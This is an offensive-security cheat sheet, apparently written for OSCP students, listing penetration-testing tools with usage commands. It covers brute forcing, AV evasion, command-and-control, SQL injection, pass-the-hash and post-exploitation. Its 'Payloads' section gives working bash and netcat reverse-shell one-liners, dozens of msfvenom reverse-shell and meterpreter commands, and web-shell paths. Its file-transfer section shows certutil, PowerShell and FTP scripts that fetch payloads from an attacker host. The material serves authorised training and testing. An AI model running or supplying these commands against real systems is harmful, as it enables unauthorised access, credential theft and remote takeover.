Penetration testing tools

Author: root4loot

A neat list of penetration testing (some red) tools with usage commands and examples for quick reference. Originally intended for OSCP students.

Running (the majority of) these tools against any server without permission is considered illegal so use with extreme caution.

AV Evasion

Veil
Python script designed to generate metasploit payloads that bypass common anti-virus solutions.

Usage:
  python Veil-Evasion.py

peCloak
Python script that takes an automated approach to AV evasion.

Usage:
  peCloak.py [[options]] [path_to_pe_file]

Example:
  python peCloak.py plink.exe
  ..
  New file saved [plink_1540964122_cloaked.exe]

OWASP ZSC
Open source software in Python language which lets you generate customized shellcodes and convert scripts to an obfuscated script.

Usage: ./zsc

  zsc> help

[+] shellcode      	generate shellcode
[+] shellcode>generate	to generate shellcode
[+] shellcode>search	search for shellcode in shellstorm
[+] shellcode>download	download shellcodes from shellstorm
[+] shellcode>shell_storm_list	list all shellcodes in shellstorm
[+] obfuscate      	generate obfuscate code
[+] back           	Go back one step
[+] clear          	clears the screen
[+] help           	show help menu
[+] update         	check for update
[+] about          	about owasp zsc
[+] restart        	restart the software
[+] version        	software version
[+] exit/quit      	to exit the software
[+] #              	insert comment
[+] zsc -h, --help	basic interface help

Brute Force

Ncrack
High-speed network authentication cracking tool.

Examples:
  SSH: ncrack -u testuser -P wordlist.txt <host> -p 22
  RDP: ncrack -u testuser -P wordlist.txt <host> -p 3389
  FTP: ncrack -u testuser -P wordlist.txt <host> -p 21

Medusa
Login brute-forcer tool designed to be speedy, parallel and modular.
It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.

Syntax:
  Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

Examples:
  SSH: medusa -u testuser -P wordlist.txt -h <host> -M ssh
  FTP: ncrack -u testuser -P wordlist.txt -T 5 <host> -M ftp
  RDP (pass-the-hash):
      medusa -M rdp -m PASS:HASH -h <host> -u someuser -p <NTLM_hash>
  

Spray
Password Spraying tool for Active Directory Credentials. Supports SMB, OWA, Lync, Cisco Web VPN.


Usage:
  SMB:  spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  OWA:  spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
  Lync: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>

Examples:
  SMB:  spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
  OWA:  spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt
  Lync: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35

Note: For POST requests, replace username and password values with "sprayuser" and "spraypassword".

THC-Hydra
Parallelized login cracker which supports numerous protocols to attack.
It is very fast and flexible, and new modules are easy to add.

Syntax:
  hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Examples:
  SSH: hydra 10.10.10.1 -l testuser -P wordlist.txt  -t 4 ssh
  RDP: hydra -V -l testuser -P wordlist.txt rdp://10.10.10.1
  FTP: hydra 10.10.10.1 -V -l testuser -P wordlist.txt ftp
  SMB: hydra 10.10.10.1 -V -l testuser -P wordlist.txt smb
  POST form:
    hydra -l testuser -p wordlist.txt -e nsr 10.10.10.1 http-post-form "http://10.10.10.1/login.php:username=^USER^&password=^PASS^&submit=Login:<Error message>" -V

Patator
A great multi-purpose brute-forcer, with a modular design and a flexible usage.

Examples:
  FTP: patator ftp_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
  SSH: patator ssh_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt

Command & Control

dnscat2
Tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.

Usage:
  ./dnscat

DropboxC2C
Post-exploitation agent which uses Dropbox Infrastructure for command and control operations.

Structure:
  main.py - The "server" part which manages all the agents.
  agent.py - The "client" part which does what the server tells.

  1. Modify the API Key on agent.py and main.py (the api key must be created from the   dropbox web interface)
  2. Run setup.bat on a Windows Machine. You will get agent.exe which is the "compiled" agent.
  3. Run main.py and run the agent on the compromised server.

gcat
A stealthy Python based backdoor that uses Gmail as a command and control server.

See https://github.com/byt3bl33d3r/gcat

Merlin
Cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

Quick start guide:
  Server: https://github.com/Ne0nd0g/merlin/wiki/Server-Execution-Quick-Start-Guide
  Agent: https://github.com/Ne0nd0g/merlin/wiki/Agent-Execution-Quick-Start-Guide

Databases

NoSQLMap
Open source Python-based automated NoSQL MongoDB exploitation tool.

Usage:
  python NoSQLMap

SQLmap
Open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Usage:
  python sqlmap [options]

Examples:
  python sqlmap.py -u "http://targetsite.com/vuln.php"
  python sqlmap.py -u "http://targetsite.com/login.aspx" --method POST --data "username=foo&password=bar&submit=login" --dbms=mssql --tables

Miscellaneous

httprobe
Take a list of domains and probe for working HTTP and HTTPS servers.

Example usage:  
  cat domains.txt | httprobe | tee alive.txt
  cat domains.txt | httprobe -p http:8080 -p https:4443 | tee alive.txt

RTFM
RTFM (Red Team Field Manual) is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it.

Update database:      ./rtfm.py -u
Search for something: ./rtfm.py -e 'Something'
Search by date:       ./rtfm.py -A yyyy-mm-dd (or now/today)
List all tags:        ./rtfm.py -Dt

-e (search for command): ./rtfm.py -pP -c 'sqlmap'
-t (search for tag):     ./rtfm.py -pP -t xss

rescope
Rescope is a tool geared towards pentesters and bugbounty researchers, that aims to make life easier when defining scopes for Burp Suite and OWASP ZAP.

Example usage:
  rescope --burp -u bugcrowd.com/bugcrowd -o burpscope.json
  rescope --zap --name CoolScope -u bugcrowd.com/bugcrowd -o burpscope.context
  rescope --burp -i scopedefinitions.txt -o burpscope.json --silent

Network Related

Airgeddon
A multi-use bash script for Linux systems to audit wireless networks.

Usage:
  sudo bash airgeddon.sh

SPARTA
Python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase.

Usage:
  ./sparta

SSH
Pivoting with SSH.

Port forwarding:
  Local:   ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
  Remote:  ssh <gateway> -R <remote port to bind>:<local host>:<local port>
  Dynamic: ssh <gateway> -D <port to bind>

Plink
Pivoting with Plink.exe (SSH for Windows).

Port forwarding:
  Local:   plink.exe <gateway> -L <local port to listen>:<remote host>:<remote port>
  Remote:  plink.exe <gateway> -R <remote port to bind>:<local host>:<local port>
  Dynamic: plink.exe <gateway> -D <port to bind>

Wifite 2
A tool to attack multiple WEP and WPA encrypted networks at the same time.

Example usage:
  ./Wifite.py -i wlan0 --wpa

WIFIPhisher
An automated phishing attack tool for Wifi networks.

Example usage:
  wifiphisher -i wlan0 -e 'Free Wifi' -hC capture.pcap

Printers

Praedasploit
Contains a number of commonly found printer exploits.

Usage:  
  See https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules

PRET
Printer Exploitation Toolkit - The tool that made dumpster diving obsolete.

Usage: 
  ./pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}

Example usage:
  ./pret.py laserjet.lan ps
  ./pret.py /dev/usb/lp0 pjl

Samba

CrackMapExec
A post-exploitation tool that helps automate assessing the security of large Active Directory networks. CME makes heavy use of the Impacket library.

Examples usage:
  crackmapexec <protocol> 192.168.1.0/24
  crackmapexec <protocol> ~/targets.txt

Pass-the-hash: 
  crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
  crackmapexec smb <target(s)> -u username -H NTHASH

Null sessions:
  crackmapexec smb <target(s)> -u '' -p ''

enum4linux
A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.

Usage:
  ./enum4linux.pl [options] ip

Example:
  ./enum4linux.pl -U -o 192.168.1.200

nullinux
Internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.

Usage:
    python3 nullinux.py -users -quick DC1.Domain.net
    python3 nullinux.py -all 192.168.0.0-5
    python3 nullinux.py -shares -U 'Domain\User' -P 'Password1' 10.0.0.1,10.0.0.5

Responder
A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Usage:
  ./Responder.py [options]

Example:
  ./Responder.py -I eth0 -wrf

Smbexec
A rapid psexec style attack with samba tools.

Usage:
  ./smbexec

Main menu:
  1. System Enumeration
  2. System Exploitation
  3. Obtain Hashes
  4. Options
  5. Exit

Smbclient
FTP-like client to access SMB/CIFS resources on servers. Part of the Samba suite.

Example usage:

  Pass-the-hash: 
    smbclient -U testuser%<nthash> --pw-nt-hash -L 192.168.0.1
    smbclient \\\\192.168.0.1\\domain -U testuser%<nthash> --pw-nt-hash

  Map drives:
    smbclient \\\\192.168.0.1\\sharename$
    smbclient \\\\192.168.0.1\\sharename$ -U root%

Wmiexec
A similar approach to smbexec but executing commands through WMI.

Usage: 
  wmiexec.py [-h] [-share SHARE] [-nooutput] [-debug] [-codec CODEC]
                  [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                  [-dc-ip ip address] [-A authfile]
                  target [command [command ...]]

Example:
  ./wmiexec.py -hashes <ntlmhash> Administrator@10.10.0.1

Web related

Arjun
Arjun is a HTTP parameter discovery suite.

Example usage:

Find GET parameters:
  python3 arjun.py -u https://api.example.com/endpoint --get

Find POST parameters
  python3 arjun.py -u https://api.example.com/endpoint --post

Multi-threading:
  python3 arjun.py -u https://api.example.com/endpoint --get -t 22

Delay between requests:
  python3 arjun.py -u https://api.example.com/endpoint --get -d 2

Add HTTP headers:
  python3 arjun.py -u https://api.example.com/endpoint --get --headers

BeEF Exploitation Framework
A cross-site scripting (XSS) attack framework.

Usage:
  ./beef

Burp
An awesome graphical tool for testing Web application security.

Usage: 
  see https://portswigger.net/burp/documentation/contents

CMSmap
Python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.

Examples:
  cmsmap.py http://example.com
  cmsmap.py http://example.com -f W -F --noedb -d
  cmsmap.py http://example.com -i targets.txt -o output.txt
  cmsmap.py http://example.com -u admin -p passwords.txt
  cmsmap.py http://example.com  -k hashes.txt -w passwords.txt

CORStest
A simple CORS misconfiguration scanner

Usage:
  corstest.py [arguments] infile

Example usage:
  corstest.py hosts.txt

Gobuster
Directory/file & DNS busting tool written in Go.

Example usage:

  Standard dir bust:
    gobuster -u https://example.com -w /path/to/wordlist.txt -n

  Display content length:
    gobuster -u https://example.com -w /path/to/wordlist.txt -l

  Filter results based on status codes 200, 403:
    gobuster -u https://example.com -w /path/to/wordlist.txt -s '200,403' -e

  Filter results based on file extensions:
    gobuster -u https://example.com -w /path/to/wordlist.txt -x 'asp,aspx'

SPartan
Frontpage and Sharepoint fingerprinting and attack tool.

Usage:
  python SPartan.py -u http://127.0.0.1 -f -c

  -u: host URL
  -c: crawl the site for links
  -f: perform frontpage scans
  --sps: discover sharepoint SOAP services

Parameth
This tool can be used to brute discover GET and POST parameters-

Usage example:
  ./parameth.py -u https://example.com/somepage.php
  ./parameth.py -u https://example.com/somepage.php --data <post_data>
  ./parameth.py -u https://example.com/somepage.php --cookie <cookie>

Tplmap
Server-Side Template Injection and Code Injection Detection and Exploitation Tool.

Usage example:
  Test if parameter is vulnerable to SSTI:
    ./tplmap.py -u 'http://www.target.com/page?name=John'
  Launch a pseudo-terminal on the target:
    ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'

JShell
A nice little tool to quickly get a Javascript shell from XSS. Running shell.py will generate the js payload and setup a listener on port 33 (default).

Usage:
  python shell.py

OWASP ZAP
Open-source web application security scanner.

Usage:
  see https://github.com/zaproxy/zaproxy/wiki/Videos

Sublist3r
Fast subdomains enumeration tool for penetration testers.

Example usage:

Enumerate subdomains of specific domain:
  python sublist3r.py -d example.com

Show only subdomains which have open ports 80 and 443:
  python sublist3r.py -d example.com -p 80,443

Show the results in realtime:
  python sublist3r.py -v -d example.com

WPScan
Black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.

Usage:
  wpscan [options]

Examples:
  wpscan --url http://example.com --enumerate plugins -o output.txt
  wpscan --url http://example.com --password-attack=wp-login --usernames=/path/to/usernames.txt --passwords=/path/to/wordlist.txt

Wfuzz
Web application fuzzer.

Example usage:

  Standard fuzz:
    wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ

  Exclude 404 from results:
    wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hc 404

  Exclude results having '117 Ch' (chars):
     wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hh 117

XSStrike
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

Usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
                   [--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
                   [--verbose] [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]

Scan a single URL:
  python xsstrike.py -u "http://example.com/search.php?q=query"

Supplying POST data:
  python xsstrike.py -u "http://example.com/search.php" --data "q=query"

Test URL path components:
  python xsstrike.py -u "http://example.com/search/form/query" --path

Bruteforce payloads from a file:
  python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
  
Blind XSS:
  python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind

More usage commands: https://github.com/s0md3v/XSStrike/wiki/Usage

XXE-FTP
Basic FTP server written in Go to receive payloads from instances of XXE.

Usage:
./xxeftp -p 2121

Wordlist Generators

CeWl
A ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

Usage:
  cewl [OPTIONS] ... <url>

Example:
  cewl http://example.com --depth=4 --write=output.txt

Crunch
Wordlist generator based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.

Example usage:
  crunch 6 6 -t foo@,% >> wordlist
  # Generates foo[ALLchars][UPPERCASEletters][0-9]

Wordhound
Wordlist generator that builds a list of password candidates for a specific target website to use with something like Hashcat or Hydra.

Usage:
  python wordhound.py https://example.com/

File Transfers (non-interactive)

Linux Target

FTP
  1. Start atftpd service:

    service vsftpd start
    
  2. Create FTP script on target as follows.
    Make sure lcd path is writable:

    echo open <attacker_ip> > ftp.txt
    echo user anonymous pass >> ftp.txt
    echo binary >> ftp.txt
    echo 'lcd /tmp/' >> ftp.txt
    echo get payload.php >> ftp.txt
    echo bye >> ftp.txt
    
  3. Execute script to transfer file:

    ftp -n >> /tmp/ftp.txt
    
SSH

Usage:

scp <source> <destination>
  1. Copy file from attacker to target:

    scp username@b:/path/to/file /path/to/destination
    
  2. Copy file from target to attacker:

    scp /path/to/file username@a:/path/to/destination
    
TFTP
  1. Start atftpd service (see configuration):

    service atftpd start
    
  2. Run the following on target to transfer file:

    tftp -i <attacker_ip> GET payload.rb
    

Windows Target

Certutil

certutil.exe is a Windows CMD utility that comes pre-loaded in Windows as part of the certificate services. It can be used to transfer files from any web server, much like wget, which is very handy.

Example:

  certutil -URLCache -f http://<attacker_ip>/payload.exe C:\temp\payload.exe
FTP
  1. Start FTP server:

    python -m pyftpdlib --username=USER --password=PASS -p 21
    
  2. Create FTP script on target:

    echo open <attacker_ip> > ftp.txt
    echo USER >> ftp.txt
    echo PASS >> ftp.txt
    echo binary >> ftp.txt
    echo get payload.exe >> ftp.txt
    echo bye >> ftp.txt
    
  3. Run script to transfer file:

    ftp -s:ftp.txt
    
Powershell
  1. Create ps1 script on target as follows:

    echo $fileURL = "http://<attacker_ip>/payload.exe" > wget.ps1
    echo $fileName = "C:\path_to\payload.exe" >> wget.ps1
    echo $webclient = New-Object System.Net.WebClient >> wget.ps1
    echo $webclient.DownloadFile($fileURL,$fileName) >> wget.ps1
    
  2. Execute script to get file from web server:

    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
SMB
  1. Start SMB server with Impacket:

    python smbserver.py SHARENAME /path/to/shared/folder
    
  2. Run the following on target to transfer file:

    copy \\<attacker_ip>\SHARENAME\payload.exe
    
TFTP
  1. Start atftpd service (see configuration):

    service atftpd start
    
  2. Run the following on target to transfer file:

    tftp -i <attacker_ip> GET payload.exe
    

Information Gathering

Active

AQUATONE
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.

Example Usage:
  cat targets.txt | aquatone
  cat hosts.txt | aquatone -ports 80,443,3000,3001
  cat hosts.txt | aquatone -ports large

Discover Scripts
Custom bash scripts used to automate various pentesting tasks.

Usage: 
  See https://github.com/leebaird/discover

Eyewitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.

Usage:
  ./EyeWitness.py -f filename --timeout optionaltimeout --open (Optional)

Examples:
  ./EyeWitness -f urls.txt --web
  ./EyeWitness -x urls.xml --timeout 8 --headless
  ./EyeWitness -f rdp.txt --rdp

HTTPScreenshot
A tool for grabbing screenshots and HTML of large number of websites.

Usage:
  ./httpscreenshot.py -i \<gnmapFile\> -p -w 40 -a -vH

RegonDog
Reconnaissance Swiss Army Knife.
Features include Censys lookup, NS lookup, Subdomain lookup, Reverse IP lookup, Port scan, CMS detection, Honeypot detection.

Usage:
  python ./dog.py

MASSCAN
TCP port scanner, spews SYN packets asynchronously. Capable of scanning entire internet in a few minutes.

Usage: 
    masscan -p80,8000-8100 10.0.0.0/8

Example:
  masscan -vvv -iL hosts.txt -p0-65535 --rate 1000 -oL mass.scan

  Banner checking:
    masscan 10.0.0.0/8 -p80 --banners --source-ip 192.168.1.200

  To see the complete list of options, use the --echo feature:
    masscan -p80,8000-8100 10.0.0.0/8 --echo > xxx.conf
    masscan -c xxx.conf --rate 1000

Passive

Amass
The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing (warning: active), crawling web archives, permuting/altering names and reverse DNS sweeping.

Usage example:
  ./amass -src -ip -config amass_config.ini -d owasp.org

ct-exposer
An OSINT tool that discovers sub-domains by searching Certificate Transparency logs. The nice thing about this one is that you can export output to masscan format.

usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        domain to query for CT logs, ex: domain.com
  -u, --urls            ouput results with https:// urls for domains that
                        resolve, one per line.
  -m, --masscan         output resolved IP address, one per line. Useful for
                        masscan IP list import "-iL" format.

Gitrob
A tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. The findings will be presented through a web interface for easy browsing and analysis.Reconnaissance tool for GitHub organizations.

Usage: 
  ./gitrob [options] target [target2] ... [targetN]

Knock
Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.

Example Usage:
  Subdomain scan with internal wordlist:
    $ knockpy domain.com

  Subdomain scan with external wordlist:
    $ knockpy domain.com -w wordlist.txt

  Resolve domain name and get response headers:
    $ knockpy -r domain.com [or IP]

RegonDog
Reconnaissance Swiss Army Knife.
Features include Censys lookup, NS lookup, Subdomain lookup, Reverse IP lookup, Port scan, CMS detection, Honeypot detection.

Usage:
  python ./dog.py

SubBrute
A DNS meta-query spider that enumerates DNS records, and subdomains.

Example usage:
  ./subbrute.py google.com -o google.names
	...162 subdomains found...

  ./subbrute.py -s google.names google.com --type TXT
	google.com,"v=spf1 include:_spf.google.com ip4:216.73.93.70/31 ip4:216.73.93.72/31 ~all"
	adwords.google.com,"v=spf1 redirect=google.com"
	...

  ./subbrute.py -s google.names google.com --type CNAME
	blog.google.com,www.blogger.com,blogger.l.google.com
	groups.google.com,groups.l.google.com
	...

Subfinder
SubFinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.

The following require API keys:
  VirustotalAPIKey
  PassivetotalUsername
  PassivetotalKey
  SecurityTrailsKey
  RiddlerEmail
  RiddlerPassword
  CensysUsername
  CensysSecret
  ShodanAPIKey

Setting API keys:
  ./subfinder --set-config VirustotalAPIKey=0x41414141

Example usage:
  ./subfinder -d freelancer.com
  ./subfinder -d freelancer.com -o output.txt

Subjack
Subdomain Takeover tool written in Go

Example usage:
  ./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl

Sublist3r
Fast subdomains enumeration tool for penetration testers

Example usage:
  python sublist3r.py -d example.com
  python sublist3r.py -d example.com -p 80,443

Spiderfoot
Reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.

Usage:
  python ./sf.py

Zen
Find emails of Github users.

Example usage:

Find email address of a user:
  python zen.py username

Find email addressess of contributors of a repository:
  python zen.py https://github.com/username/repository

Find email addresses of members of an organization:
  python zen.py organization --org

Save JSON output to a file:
  python zen.py https://github.com/username/repository -o /path/to/file

Check if email has appeared in a breach (haveibeenpwned.com API):
  python zen.py s0md3v --breach

Payloads

Generic / Kali

Bash reverse shell

bash -i >& /dev/tcp/10.10.10.10/443 0>&1

Netcat reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 443 > /tmp/f

Web shells

JSP:       /opt/SecLists/Web-Shells/JSP/simple-shell.jsp
PHP:       /opt/SecLists/Web-Shells/PHP/obfuscated-phpshell.php
Wordpress: /opt/SecLists/Web-Shells/WordPress/access.php

Pentestmonkey:

ASP:  /usr/share/webshells/asp/cmd-asp-5.1.asp
      /usr/share/webshells/asp/cmdasp.asp
ASPX: /usr/share/webshells/aspx/cmdasp.aspx
CFM:  /usr/share/webshells/cfm/cfexec.cfm
JSP:  /usr/share/webshells/jsp/cmdjsp.jsp
      /usr/share/webshells/jsp/jsp-reverse.jsp
PERL: /usr/share/webshells/perl/perlcmd.cgi
      /usr/share/webshells/perl/perl-reverse-shell.pl
PHP:  /usr/share/webshells/php/php-backdoor.php
      /usr/share/webshells/php-reverse-shell.php
      /usr/share/webshells/simple-backdoor.php

Msfvenom

List payloads:

msfvenom -l payloads
  • Staged: /shell/reverse_tcp & /meterpreter/reverse_tcp
  • Stageless: /shell_reverse_tcp

The majority of payloads below are unstaged.

Windows

x86 Binary:        msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x86 -e generic/none -f exe -o payload.exe
x64 Binary:        msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x64 -e generic/none -f exe -o payload.exe
Meterpreter:       msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe > payload.exe
Shellcode(C):      msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c
Shellcode(Python): msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/s hikata_ga_nai -b "\x00" -f python -v shellcode

Linux

x86 Binary:        msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
x64 Binary:        msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
Bash:              msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=443 -f raw > payload.sh
Python:            msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=443 -f raw > payload.py
Shellcode(C):      msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f c
Shellcode(Python): msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
Perl:              msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.10 LPORT=443 -f raw > payload.pl

Mac

x86:   msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho
x64:   msfvenom -p osx/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho

Web based

WAR:   msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war > payload.war
JSP:   msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.jsp
ASP:   msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f asp > payload.asp
PHP:   msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.php && cat payload.php | pbcopy && echo '<?php ' | tr -d '\n' > payload.php && pbpaste >> payload.php

Handler

msf > use exploit/multi/handler 
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/ARCH/meterpreter/reverse_tcp
msf exploit(handler) > set EXITFUNC thread
msf exploit(handler) > set LHOST 10.10.10.10
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j

Other

SharPyShell
SharPyShell (Python) is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.

Example usage:
  python SharPyShell.py generate -p somepassword
  python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword

Post Exploitation

Linux

LinEnum
Bash script for local linux enumeration & privilege escalation checks.

Usage:
  ./linenum.sh

linux-exploit-suggester
Linux privilege escalation auditing tool.

Usage:
  ./linux-exploit-suggester.sh

Linux Exploit Suggester
Perl based linux privesc checker. Running without arguments will perform a ‘uname -r’ to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Kernel version can be specified with the -k flag.

Usage:
  perl ./Linux_Exploit_Suggester.pl

linuxprivchecker
Linux privilege escalation check script.

Usage:
  python linuxprivchecker.py

unix-privesc-check
A bash script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases).

Usage:
  ./unix-privesc-check.sh

MacOS

rootOS
macOS Root Helper (Python)

Usage: python root.py

Multi-Platform

Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Usage:
  ./start-compose.sh

Windows

BrowserGather
Powershell script to extract sensitive browser information from Chrome, Firefox and IE.

First, import the module:
  import-module .\BrowserGather.ps1

Extract credentials:
  Get-ChromeCreds "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data" | format-list *

Extract cookies:
  Get-ChromeCookies "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies" | format-list *

Empire
Powerful PowerShell & Python post-exploitation agent.

Usage:
  ./empire

Tips and tricks:
  https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/

Unicorn
A simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

Usage:
  python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

Help Menu: python unicorn.py --help

Example usage:
  PS:               python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
  PS Down/Exec:     python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
  Custom PS1:       python unicorn.py <path to ps1 file>
  Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)

Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Usage:
  Add desired fuction to end of file.
  powershell -nologo -executionpolicy bypass -file sherlock.ps1

p0wnedShell
Offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier.

Example usage:
  Run as x64 binary and bypass Applocker:
    cd \Windows\Microsoft.NET\Framework\v4.0.30319
    InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx86.exe

Windows Exploit Suggester - Next Generation (WES-NG)
WES-NG is a tool (Python) based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

How to use:
  1. Generate systeminfo:
       systeminfo > systeminfo.txt

  2. Run WES-NG against it:
       wes.py systeminfo.txt

See also: Eliminating False Positives (https://github.com/bitsadmin/wesng/wiki/Eliminating-false-positives)

Windows-Exploit-Suggester
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Usage:
  ./windows-exploit-suggester.py --update